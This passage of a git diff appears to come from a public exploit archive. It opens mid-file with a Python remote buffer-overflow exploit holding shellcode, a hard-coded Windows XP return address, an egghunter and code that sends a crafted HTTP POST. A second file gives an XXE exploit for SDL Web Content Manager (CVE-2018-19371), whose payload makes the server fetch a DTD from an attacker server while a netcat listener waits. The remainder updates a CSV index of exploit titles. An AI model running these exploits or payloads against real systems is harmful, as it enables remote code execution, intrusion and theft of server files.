+"\x1a\x38\x91\x72\xf0\x51\x3a\x8f\xfb\x4c\xe7\x06\x1d\x04\x07"
+"\x4f\xb5\xb0\xe5\xb4\x0e\x27\x15\x9f\x26\xcf\x5e\xc9\xf1\xf0"
+"\x5e\xdf\x55\x66\xd5\x0c\x62\x97\xea\x18\xc2\xc0\x7d\xd6\x83"
+"\xa3\x1c\xe7\x89\x53\xbc\x7a\x56\xa3\xcb\x66\xc1\xf4\x9c\x59"
+"\x18\x90\x30\xc3\xb2\x86\xc8\x95\xfd\x02\x17\x66\x03\x8b\xda"
+"\xd2\x27\x9b\x22\xda\x63\xcf\xfa\x8d\x3d\xb9\xbc\x67\x8c\x13"
+"\x17\xdb\x46\xf3\xee\x17\x59\x85\xee\x7d\x2f\x69\x5e\x28\x76"
+"\x96\x6f\xbc\x7e\xef\x8d\x5c\x80\x3a\x16\x6c\xcb\x66\x3f\xe5"
+"\x92\xf3\x7d\x68\x25\x2e\x41\x95\xa6\xda\x3a\x62\xb6\xaf\x3f"
+"\x2e\x70\x5c\x32\x3f\x15\x62\xe1\x40\x3c")
+
+# findjmp kernel32.dll esp - WinXP SP3 English
+#0x7C809F83      call esp
+
+nops = "\x90" * 16
+
+junk = "A" * 1786 + "\x83\x9f\x80\x7c" + nops + egghunter + "C" * (2000 -
+1786 - 4 - 16 - len(egghunter))
+
+try:
+print "Sending exploit..."
+connection.connect((host,port))
+
+buffer = (
+"POST " + junk + " HTTP/1.1\r\n"
+"Host: " + shellcode + "\r\n\r\n")
+
+connection.send(buffer)
+connection.close()
+print "\nExploit Sended ", len(buffer)
+except:
+print "Connection error"
+
+
+
+3. Solution:
+
+This product is deprecated
+
+-->
\ No newline at end of file
diff --git a/exploits/xml/webapps/46000.txt b/exploits/xml/webapps/46000.txt
new file mode 100644
index 000000000..24bc8698b
--- /dev/null
+++ b/exploits/xml/webapps/46000.txt
@@ -0,0 +1,33 @@
+######################
+# Author Information #
+######################
+Author : Ahmed Elhady Mohamed
+twitter : @Ahmed__ELhady
+Company : Canon Security
+Date : 25/11/2018
+########################
+# Software Information #
+########################
+Affected Software : SDL Web Content Manager
+Version: Build 8.5.0
+Vendor: SDL Tridion
+Software website : https://www.sdl.com
+CVE Number: CVE-2018-19371
+###############
+# Description #
+###############
+SDL Web Content Manager build 8.5.0 is vulnerable to XXE vulnerability in SaveUserSettings web service. SaveUserSettings web service takes XML values as a parameter. The webservices allows and accepts XML external entity which allows an attacker to read sensitive files from the server. Moreover it can be used to perform network port scanning to internal network.
+#################
+# Exploit Steps #
+#################
+1- Access the application with any user account
+2- it will ask you to choose your language preferences
+3-the application sent a request to SaveUserSettings web service with XML content in the request body.
+4- open a port listener on the attacker server using netcat tool as the following: nc -lvp 80
+5- intercept the request using Burpsuite proxy tool
+6- inject the following payload in the beginning of the XML value.
+<!DOCTYPE cdl [<!ENTITY % asd SYSTEM \"http://attackerServer/xxe1.dtd\">%asd;%c;]>
+<cdl>&rrr;</cdl>
+7- The injected payload allows the server to fetch the xxe1.dtd resource from the hacker server.
+8- send the request to the server.
+9- The application server will connect to the attacker server
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f52de96a6..8dd0eeddd 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -1247,6 +1247,7 @@ id,file,description,date,author,type,platform,port
 10068,exploits/windows/dos/10068.rb,"Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)",2009-11-12,"H D Moore",dos,windows,
 10073,exploits/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - Denial of Service",2009-10-02,PLATEN,dos,windows,21
 10077,exploits/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",dos,multiple,389
+10078,exploits/osx/dos/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local Buffer Overflow (PoC)",2009-10-02,mu-b,dos,osx,
 33476,exploits/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Multiple Vulnerabilities",2010-01-07,anonymous,dos,hardware,
 10091,exploits/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",dos,windows,515
 10092,exploits/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,dos,windows,
@@ -6215,6 +6216,10 @@ id,file,description,date,author,type,platform,port
 45984,exploits/multiple/dos/45984.html,"WebKit JIT - Int32/Double Arrays can have Proxy Objects in the Prototype Chains",2018-12-13,"Google Security Research",dos,multiple,
 45993,exploits/windows/dos/45993.py,"Angry IP Scanner 3.5.3 - Denial of Service (PoC)",2018-12-14,"Fernando Cruz",dos,windows,
 45996,exploits/windows/dos/45996.py,"UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC)",2018-12-14,"Francisco Ramirez",dos,windows,
+46001,exploits/windows/dos/46001.html,"Microsoft Windows - 'jscript!JsArrayFunctionHeapSort' Out-of-Bounds Write",2018-12-18,"Google Security Research",dos,windows,
+46002,exploits/windows/dos/46002.py,"AnyBurn 4.3 - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows,
+46003,exploits/windows/dos/46003.py,"Exel Password Recovery 8.2.0.0 - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows,
+46004,exploits/windows/dos/46004.py,"MegaPing - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -6376,7 +6381,7 @@ id,file,description,date,author,type,platform,port
 741,exploits/linux/local/741.pl,"HTGET 0.9.x - Local Privilege Escalation",2005-01-05,nekd0,local,linux,
 744,exploits/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Local Privilege Escalation (1)",2005-01-07,"Paul Starzetz",local,linux,
 749,exploits/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Privilege Escalation",2005-01-11,"Cesar Cerrudo",local,windows,
-756,exploits/linux/local/756.c,"Exim 4.41 - 'dns_build_reverse' Local",2005-01-15,"Rafael Carrasco",local,linux,
+756,exploits/linux/local/756.c,"Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow",2005-01-15,"Rafael Carrasco",local,linux,
 758,exploits/osx/local/758.c,"Apple iTunes - Playlist Parsing Local Buffer Overflow",2005-01-16,nemo,local,osx,
 760,exploits/windows/local/760.cpp,"Peer2Mail 1.4 - Encrypted Password Dumper",2005-01-16,ATmaCA,local,windows,
 763,exploits/linux/local/763.c,"fkey 0.0.2 - Local File Accessibility",2005-01-20,vade79,local,linux,79
@@ -6432,7 +6437,7 @@ id,file,description,date,author,type,platform,port
 937,exploits/windows/local/937.c,"BitComet 0.57 - Local Proxy Password Disclosure",2005-04-13,Kozan,local,windows,
 938,exploits/windows/local/938.cpp,"Microsoft Windows - 'HTA' Script Execution (MS05-016)",2005-04-14,ZwelL,local,windows,
 950,exploits/linux/local/950.c,"BitchX 1.0c20 - Local Buffer Overflow",2005-04-21,sk,local,linux,
-951,exploits/windows/local/951.py,"Microsoft Jet Database - 'msjet40.dll' Reverse Shell (2)",2005-04-22,"Jean Luc",local,windows,
+951,exploits/windows/local/951.py,"Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)",2005-04-22,"Jean Luc",local,windows,
 963,exploits/windows/local/963.c,"GoText 1.01 - Local User Informations Disclosure",2005-04-28,Kozan,local,windows,
 964,exploits/windows/local/964.c,"FilePocket 1.2 - Local Proxy Password Disclosure",2005-04-28,Kozan,local,windows,
 965,exploits/windows/local/965.c,"ICUII 7.0 - Local Password Disclosure",2005-04-28,Kozan,local,windows,
@@ -6795,7 +6800,7 @@ id,file,description,date,author,type,platform,port
 6333,exploits/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - '.bcproj' Local Buffer Overflow",2008-08-30,Koshi,local,windows,
 6337,exploits/linux/local/6337.sh,"Postfix 2.6-20080814 - 'symlink' Local Privilege Escalation",2008-08-31,RoMaNSoFt,local,linux,
 6389,exploits/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow",2008-09-06,"fl0 fl0w",local,windows,
-6705,exploits/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local",2008-10-08,"Cesar Cerrudo",local,windows,
+6705,exploits/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation",2008-10-08,"Cesar Cerrudo",local,windows,
 6757,exploits/windows/local/6757.txt,"Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (K-plugin) (MS08-066)",2008-10-15,"Ruben Santamarta",local,windows,
 6787,exploits/windows/local/6787.pl,"BitTorrent 6.0.3 - '.torrent' Local Stack Buffer Overflow",2008-10-19,"Guido Landi",local,windows,
 6798,exploits/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' Local Stack Buffer Overflow",2008-10-21,"Guido Landi",local,windows,
@@ -7134,7 +7139,6 @@ id,file,description,date,author,type,platform,port
 10060,exploits/linux/local/10060.sh,"Geany .18 - Local File Overwrite",2009-10-06,"Jeremy Brown",local,linux,
 10072,exploits/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security",2009-11-12,"Marsh Ray",local,multiple,
 10076,exploits/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Privilege Escalation",2009-10-02,mu-b,local,osx,
-10078,exploits/osx/local/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local",2009-10-02,mu-b,local,osx,
 33426,exploits/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (SEH Unicode)",2014-05-19,"Mike Czumak",local,windows,
 10084,exploits/windows/local/10084.txt,"Quick Heal 10.00 SP1 - Local Privilege Escalation",2009-10-13,"Maxim A. Kulakov",local,windows,
 10201,exploits/windows/local/10201.pl,"TEKUVA - Password Reminder Authentication Bypass",2009-11-21,iqlusion,local,windows,
@@ -10149,6 +10153,7 @@ id,file,description,date,author,type,platform,port
 45961,exploits/windows/local/45961.txt,"McAfee True Key - McAfee.TrueKey.Service Privilege Escalation",2018-12-11,"Google Security Research",local,windows,
 45985,exploits/windows/local/45985.rb,"CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)",2018-12-13,Metasploit,local,windows,
 45988,exploits/windows/local/45988.py,"Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH)",2018-12-14,"Manpreet Singh Kheberi",local,windows,
+46005,exploits/windows/local/46005.py,"Nsauditor 3.0.28.0 - Local SEH Buffer Overflow",2018-12-18,Achilles,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -11779,7 +11784,7 @@ id,file,description,date,author,type,platform,port
 15371,exploits/windows/remote/15371.txt,"Yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,remote,windows,
 15373,exploits/windows/remote/15373.txt,"Mongoose Web Server 2.11 - Directory Traversal",2010-11-01,nitr0us,remote,windows,
 15421,exploits/windows/remote/15421.html,"Microsoft Internet Explorer 6/7/8 - Memory Corruption",2010-11-04,ryujin,remote,windows,
-15423,exploits/android/remote/15423.html,"Google Android 2.0 < 2.1 - Reverse Shell",2010-11-05,"MJ Keith",remote,android,
+15423,exploits/android/remote/15423.html,"Google Android 2.0 < 2.1 - Code Execution (Reverse Shell 10.0.2.2:2222/TCP)",2010-11-05,"MJ Keith",remote,android,
 15427,exploits/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Directory Traversal",2010-11-05,"Yakir Wizman",remote,windows,
 15437,exploits/windows/remote/15437.txt,"Quick Tftp Server Pro 2.1 - Directory Traversal",2010-11-05,"Yakir Wizman",remote,windows,
 15438,exploits/windows/remote/15438.txt,"AT-TFTP Server 1.8 - Directory Traversal",2010-11-06,"Yakir Wizman",remote,windows,
@@ -17008,6 +17013,7 @@ id,file,description,date,author,type,platform,port
 45952,exploits/windows/remote/45952.rb,"HP Intelligent Management - Java Deserialization RCE (Metasploit)",2018-12-04,Metasploit,remote,windows,8080
 45986,exploits/hardware/remote/45986.py,"Cisco RV110W - Password Disclosure / Command Execution",2018-12-14,RySh,remote,hardware,443
 45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos,
+45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - Remote Buffer Overflow HEAD and POST Method",2018-12-18,"Rafael Pedrero",remote,windows,80
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40494,3 +40500,4 @@ id,file,description,date,author,type,platform,port
 45994,exploits/php/webapps/45994.txt,"Facebook And Google Reviews System For Businesses 1.1 - SQL Injection",2018-12-14,"Ihsan Sencan",webapps,php,
 45995,exploits/php/webapps/45995.txt,"Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution",2018-12-14,"Ihsan Sencan",webapps,php,
 45997,exploits/php/webapps/45997.txt,"Double Your Bitcoin Script Automatic - Authentication Bypass",2018-12-14,Veyselxan,webapps,php,
+46000,exploits/xml/webapps/46000.txt,"SDL Web Content Manager 8.5.0 - XML External Entity Injection",2018-12-18,"Ahmed Elhady Mohamed",webapps,xml,